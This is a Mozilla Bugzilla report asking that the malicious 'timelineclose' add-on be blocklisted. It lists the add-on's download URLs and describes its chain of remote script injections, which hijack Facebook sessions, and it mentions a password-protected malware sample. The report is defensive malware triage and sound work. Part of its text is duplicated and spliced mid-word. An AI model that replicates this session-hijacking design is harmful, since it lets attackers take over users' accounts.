Closed
Bug 769781
Opened 12 years ago
Closed 12 years ago
Blocklist malicious 'timelineclose' add-on
Categories
(Toolkit :: Blocklist Policy Requests, defect)
Toolkit
Blocklist Policy Requests
Tracking
()
RESOLVED
FIXED
People
(Reporter: jorgev, Assigned: jorgev)
Details
Attachments
(1 file)
23.26 KB,
application/x-zip-compressed
|
Details |
(Filing on Mark's behalf, due to Bugzilla problems) Download URLs: Chrome: www.timelineclose.com/index2.php FF: www.timelineclose.com/index1.php Analysis of zamantuneli.kadir.xpi Metadata claims that it's written by Facebook to turn off timeline. Add-on loads adobeflashplayer.js from it's own code Adobeflashplayer.js: Injects timelineclose.com/user/profil.js Profile.js: Injects timelineclose.com/users/profil.php Profil.php: Hijacks a victim's Facebook session and subscribes them to 18 Facebook accounts It shouldn't claim to be a Facebook add-on and then hDownload URLs: Chrome: www.timelineclose.com/index2.php FF: www.timelineclose.com/index1.php Analysis of zamantuneli.kadir.xpi Metadata claims that it's written by Facebook to turn off timeline. Add-on loads adobeflashplayer.js from it's own code Adobeflashplayer.js: Injects timelineclose.com/user/profil.js Profile.js: Injects timelineclose.com/users/profil.php Profil.php: Hijacks a victim's Facebook session and subscribes them to 18 Facebook accounts It shouldn't claim to be a Facebook add-on and then hijack your session to subscribe you to multiple accounts of people you don't know. Attached file has the add-on and remote JS. Password is 'malwares4mple'. ijack your session to subscribe you to multiple accounts of people you don't know. Attached file has the add-on and remote JS. Password is 'malwares4mple'.
Assignee | ||
Comment 1•12 years ago
|
||
Id: {392e123b-b691-4a5e-b52f-c4c1027e749c}
Assignee | ||
Comment 2•12 years ago
|
||
Blocked: https://addons.mozilla.org/en-US/firefox/blocked/i109
Status: ASSIGNED → RESOLVED
Closed: 12 years ago
Resolution: --- → FIXED
Updated•8 years ago
|
Product: addons.mozilla.org → Toolkit
You need to log in
before you can comment on or make changes to this bug.
Description
•